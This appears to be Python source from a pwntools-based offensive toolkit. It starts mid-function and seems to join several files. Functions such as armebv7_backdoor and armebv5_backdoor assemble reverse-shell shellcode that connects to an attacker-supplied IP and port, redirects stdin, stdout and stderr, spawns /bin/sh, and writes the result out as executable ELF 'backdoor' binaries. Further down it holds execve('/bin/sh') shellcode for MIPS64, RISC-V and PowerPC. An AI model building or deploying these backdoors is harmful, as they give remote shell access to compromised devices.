	mov r7,#200
	add r7,r7,#81
	svc #1
	mov r6,r0
	mov r1,r5
	mov r2,#0x10
	add r7,r7,#2
	svc #1
	mov r0,r6
	eor r1,r1,r1
	mov r7,#63
	svc #1
	mov r0,r6
	add r1,r1,#1
	svc #1
	mov r0,r6
	add r1,r1,#1
	svc #1
	mov r0,r4
	eor r1,r1,r1
	eor r2,r2,r2
	push {r0,r1}
	mov r1,sp
	mov r7,#0xb
	svc #1
	'''
	handle_ip=reverse_ip.split('.')[::-1]
	handle_port=list(p16(reverse_port))
	for i in range(len(handle_ip)):
		if handle_ip[i]!="0":
			handle_ip[i]="mov r7,#"+handle_ip[i]
		else:
			handle_ip[i]="eor r7,r7,r7"
	for i in range(len(handle_port)):
		if handle_port[i]!="\x00":
			handle_port[i]="mov r7,#"+str(u8(handle_port[i]))
		else:
			handle_port[i]="eor r7,r7,r7"

	shellcode=shellcode%(handle_ip[0],handle_ip[1],handle_ip[2],handle_ip[3],handle_port[0],handle_port[1])
	#print shellcode
	#str(u8(handle_port[0])),str(u8(handle_port[1])
	#handle_ip[0],handle_ip[1],handle_ip[2],handle_ip[3]
	shellcode=asm(shellcode)[:-2]
	shellcode_hex=''
	shellcode_hex=extract_shellcode.extract_sl_print(shellcode,shellcode_hex)
	shellcode_len=len(shellcode)
	if "\\x00" in shellcode_hex:
		log.info("pay attaction NULL byte in shellcode(len is {})".format(shellcode_len))
		log.info("the null byte in %d"%shellcode.index("\x00"))
		print(shellcode_hex)
		return shellcode
	else:
		log.success("No NULL byte shellcode for hex(len is {}):".format(shellcode_len))
		print(shellcode_hex)
		return shellcode

def armebv7_backdoor(reverse_ip,reverse_port,filename=None):
	context.bits="32"
	context.arch='arm'
	context.endian='big'
	basic_shellcode=asm(shellcraft.connect(reverse_ip,reverse_port))
	shellcode2='''
	mov r5,r6
	mov r0,r5
	mov r1,#0
	movw r7,#0x3f
	svc #0
	mov r0,r5
	mov r1,#1
	svc #0
	mov r0,r5
	mov r1,#2
	svc #0
	'''
	shellcode2=asm(shellcode2)
	shellcode3=asm(shellcraft.sh())
	all_reverseshell=basic_shellcode+shellcode2+shellcode3
	data=make_elf(all_reverseshell)
	if filename==None:
		filename="backdoor_armv7"
		f=open(filename,"wb")
		f.write(data)
		f.close()
		#print disasm(all_reverseshell)
		print("backdoor_armv7 is ok in current path ./")


def armebv5_backdoor(reverse_ip,reverse_port,filename=None):
	context.bit="32"
	context.arch='arm'
	context.endian='big'
	basic_shellcode=asm(shellcraft.connect(reverse_ip,reverse_port))
	shellcode2='''
	mov r5,r6
	mov r0,r5
	mov r1,#0
	movw r7,#0x3f
	svc #0
	mov r0,r5
	mov r1,#1
	svc #0
	mov r0,r5
	mov r1,#2
	svc #0
	'''
	shellcode2=asm(shellcode2)
	shellcode3=asm(shellcraft.sh())
	all_reverseshell=basic_shellcode+shellcode2+shellcode3
	data=make_elf(all_reverseshell)
	if filename==None:
		filename="backdoor_armebv5"
		f=open(filename,"wb")
		f.write(data)
		f.close()
		#print disasm(all_reverseshell)
		print("backdoor_armebv5 is ok in current path ./")



import os
import shutil
import random
import string
from os import path
import subprocess
import tempfile
from pwn import context,log,sleep,pwnlib
from pwnlib import atexit
import re

chars = string.ascii_letters

def random_string_generator(str_size, allowed_chars):
	return ''.join(random.choice(allowed_chars) for x in range(str_size))

	
'''
child1 = subprocess.Popen(['cat','/etc/passwd'],stdout=subprocess.PIPE)
print(child1.stdout.read())

update 2022.12.25 
'''

remove_null = lambda x:[i for i in x if i != '']


def spaceReplace(i):
    i = re.sub(' +', ' ', i).split(' ')
    return i


def get_envir_args(envp):
	return remove_null(spaceReplace(envp))



def my_make_elf(code , filename=None,vma= None,shared=False, strip=None,extract=None):
	assembler = pwnlib.asm._assembler()
	linker    = pwnlib.asm._linker()
	log.debug("Building ELF:\n")
	tmpdir= tempfile.mkdtemp(prefix = 'pwn-asm-')
	step1 = path.join(tmpdir, 'step1-asm')
	step2 = path.join(tmpdir, 'step2-obj')
	step3 = path.join(tmpdir, 'step3-elf')
	try:
		code = pwnlib.asm.cpp(code)
		with open(step1, 'w') as f:
			f.write(code)

		pwnlib.asm._run(assembler + ['-o', step2, step1])
		linker_options = ['-z', 'execstack']
		if vma is not None:

			linker_options += ['--section-start=.shellcode=%#x' % vma,
                               '--entry=%#x' % vma]
		elif shared:
			linker_options += ['-shared', '-init=_start']

		linker_options += ['-o', step3, step2]

		pwnlib.asm._run(linker + linker_options)

		if strip:
			pwnlib.asm._run([pwnlib.asm.which_binutils('objcopy'), '-Sg', step3])
			pwnlib.asm._run([pwnlib.asm.which_binutils('strip'), '--strip-unneeded', step3])

		if not extract:
			os.chmod(step3, 0o755)
			if(filename == None):
				basename = context.arch + '-noknow-' + random_string_generator(4,chars)
				shutil.copyfile(step3,basename)
				os.chmod(basename, 0o755)
				retval = basename
			else:
				shutil.copyfile(step3,filename)
				os.chmod(filename, 0o755)
				retval = filename

		else:
			with open(step3, 'rb') as f:
				retval = f.read()
	except Exception:
		log.exception("An error occurred while building an ELF:\n%s" % code)
	else:
		atexit.register(lambda: shutil.rmtree(tmpdir))
	return retval
	'''
	if arch =='arm' or arch == 'mips64' or arch == 'mips64el':
		generate_o_cmd = [assembler_as, assembler[2],'-o',generate_o,source_s]
		generate_elf_cmd = [assembler_ld, assembler[2],'-o', filename, generate_o]
	else:
		generate_o_cmd = [assembler_as, assembler[2], assembler[3],'-o',generate_o,source_s]
		generate_elf_cmd = [assembler_ld, '-o', filename, generate_o]
	try:
		print(generate_o_cmd)
		print(generate_elf_cmd)
		child1 = subprocess.Popen(generate_o_cmd ,stdout=subprocess.PIPE)
		sleep(0.2)
		child2 = subprocess.Popen(generate_elf_cmd ,stdout=subprocess.PIPE)
		log.success("{} generated successfully".format(filename))
		sleep(0.2)
		os.remove(generate_o)
		sleep(0.2)
		os.remove(source_s)
	except  Exception as e:
		print(e)
		os.remove(generate_o)
		os.remove(source_s)
	'''

def my_bfdname():
    arch = context.arch
    E    = context.endianness
    #print("doudou")
    bfdnames = {
        'i386'    : 'elf32-i386',
        'aarch64' : 'elf64-%saarch64' % E,
        'amd64'   : 'elf64-x86-64',
        'arm'     : 'elf32-%sarm' % E,
        'thumb'   : 'elf32-%sarm' % E,
        'avr'     : 'elf32-avr',
        'mips'    : 'elf32-trad%smips' % E,
        'mips64'  : 'elf64-trad%smips' % E,
        'alpha'   : 'elf64-alpha',
        'cris'    : 'elf32-cris',
        'ia64'    : 'elf64-ia64-%s' % E,
        'm68k'    : 'elf32-m68k',
        'msp430'  : 'elf32-msp430',
        'powerpc' : 'elf32-powerpc',
        'powerpc64' : 'elf64-powerpc',
        'riscv'   : 'elf%d-%sriscv' % (context.bits, E),
        'vax'     : 'elf32-vax',
        's390'    : 'elf%d-s390' % context.bits,
        'sparc'   : 'elf32-sparc',
        'sparc64' : 'elf64-sparc',
        'loongarch64' : None
    }

    if arch in bfdnames:
        return bfdnames[arch]
    else:
        raise Exception("Cannot find bfd name for architecture %r" % arch)



def my_linker():
    ld  = [pwnlib.asm.which_binutils('ld')]
    #bfd = ['--oformat=' + my_bfdname()]

    E = {
        'big':    '-EB',
        'little': '-EL'
    }[context.endianness]

    arguments = {
        'i386': ['-m', 'elf_i386'],
    }.get(context.arch, [])

    return ld  + [E] + arguments





def my_make_loongarch64_elf(code , filename=None,vma= None,shared=False, strip=None,extract=None):
	assembler = pwnlib.asm._assembler()
	linker    = my_linker()
	print(assembler,linker)
	log.debug("Building ELF:\n")
	tmpdir= tempfile.mkdtemp(prefix = 'pwn-asm-')
	step1 = path.join(tmpdir, 'step1-asm')
	step2 = path.join(tmpdir, 'step2-obj')
	step3 = path.join(tmpdir, 'step3-elf')
	try:
		code = pwnlib.asm.cpp(code)
		with open(step1, 'w') as f:
			f.write(code)

		pwnlib.asm._run(assembler + ['-o', step2, step1])
		linker_options = ['-z', 'execstack']
		if vma is not None:

			linker_options += ['--section-start=.shellcode=%#x' % vma,
                               '--entry=%#x' % vma]
		elif shared:
			linker_options += ['-shared', '-init=_start']

		linker_options += ['-o', step3, step2]

		pwnlib.asm._run(linker + linker_options)

		if strip:
			pwnlib.asm._run([pwnlib.asm.which_binutils('objcopy'), '-Sg', step3])
			pwnlib.asm._run([pwnlib.asm.which_binutils('strip'), '--strip-unneeded', step3])

		if not extract:
			os.chmod(step3, 0o755)
			if(filename == None):
				basename = context.arch + '-noknow-' + random_string_generator(4,chars)
				shutil.copyfile(step3,basename)
				os.chmod(basename, 0o755)
				retval = basename
			else:
				shutil.copyfile(step3,filename)
				os.chmod(filename, 0o755)
				retval = filename

		else:
			with open(step3, 'rb') as f:
				retval = f.read()
	except Exception:
		log.exception("An error occurred while building an ELF:\n%s" % code)
	else:
		atexit.register(lambda: shutil.rmtree(tmpdir))
	return retval


from pwn import *
'''
Used to complement the generation of shell craft
'''

def mips64_sh():
	context.arch = 'mips64'
	context.endian = 'big'
	context.bits = '64'
	shellcode_execve='''
	/* execve(path='/bin/sh', argv=['sh'], envp=0) */
	lui     $t1, 0x2f62
	ori     $t1, $t1, 0x696e
	sw      $t1, -8($sp)
	lui     $t9, 0xd08c
	ori     $t9, $t9, 0x97ff
	nor     $t1, $t9, $zero
	sw      $t1, -4($sp)
	daddiu   $sp, $sp, -8
	dadd     $a0, $sp, $zero
	lui     $t1, 0x2f62
	ori     $t1, $t1, 0x696e
	sw      $t1, -12($sp)
	lui     $t9, 0xd08c
	ori     $t9, $t9, 0x97ff
	nor     $t1, $t9, $zero
	sw      $t1, -8($sp)
	sw      $zero, -4($sp)
	daddiu   $sp, $sp, -12
	slti    $a1, $zero, -1
	sd      $a1, -8($sp)
	daddi    $sp, $sp, -8
	li      $t9, -9
	nor     $a1, $t9, $zero
	dadd     $a1, $sp, $a1
	sd      $a1, -8($sp)
	daddi    $sp, $sp, -8
	dadd     $a1, $sp, $zero
	slti    $a2, $zero, -1
	li      $v0,0x13c1
	syscall 0x40404

	'''
	return shellcode_execve

def mips64el_sh():
	context.arch = 'mips64'
	context.endian = 'little'
	context.bits = '64'
	shellcode_execve='''
	/* execve(path='/bin/sh', argv=['sh'], envp=0) */
	lui     $t1, 0x6e69
	ori     $t1, $t1, 0x622f
	sw      $t1, -8($sp)
	lui     $t9, 0xff97
	ori     $t9, $t9, 0x8cd0
	nor     $t1, $t9, $zero
	sw      $t1, -4($sp)
	daddiu   $sp, $sp, -8
	dadd     $a0, $sp, $zero
	lui     $t1, 0x6e69
	ori     $t1, $t1, 0x622f
	sw      $t1,-12($sp)
	lui     $t9, 0xff97
	ori     $t9, $t9, 0x8cd0
	nor     $t1, $t9, $zero
	sw      $t1, -8($sp)
	sw      $zero, -4($sp)
	daddiu   $sp, $sp, -12
	slti    $a1, $zero, -1
	sd      $a1, -8($sp)
	daddi    $sp, $sp, -8
	li      $t9, -9
	nor     $a1, $t9, $zero
	dadd     $a1, $sp, $a1
	sd      $a1, -8($sp)
	daddi    $sp, $sp, -8
	dadd     $a1, $sp, $zero
	slti    $a2, $zero, -1
	li      $v0, 0x13c1
	syscall 0x40404

	'''
	return shellcode_execve

def riscv64el_sh():
	context.arch = 'riscv'
	context.endian = 'little'
	context.bits = '64'
	shellcode_execve='''
	/* execve(path='/bin/sh', argv=['sh'], envp=0) */
	li s1, 0x68732f2f6e69622f
	sd s1, -16(sp)
	sd zero, -8(sp)
	addi a0,sp,-16
	sd a0, -32(sp)
	addi a1,sp,-32
	slt a2,zero,-1 
	li a7, 221
	ecall

	'''
	return shellcode_execve


def powerpc_sh():
	context.arch = 'powerpc'
	context.endian = 'big'
	context.bits = '32'
	shellcode_execve='''
	/* execve(path='/bin/sh', argv=['sh'], envp=0) */
	mr    r31,r1
	xor   r9, r9, r9
	stw   r9, 4(r31)
	stw   r9, 8(r31)
	li    r9, 0x2f62
	sth   r9, 48(r31)
	li    r9, 0x696e
	sth   r9, 50(r31)
	li    r9, 0x2f73
	sth   r9, 52(r31)
	li    r9, 0x6800
	sth   r9, 54(r31)
	addi  r3, r31,0x30
	stwu  r3, 0(r31)
	mr    r4, r31
	xor   r5, r5, r5
	li    r0, 0xb
	sc
	'''
	return shellcode_execve


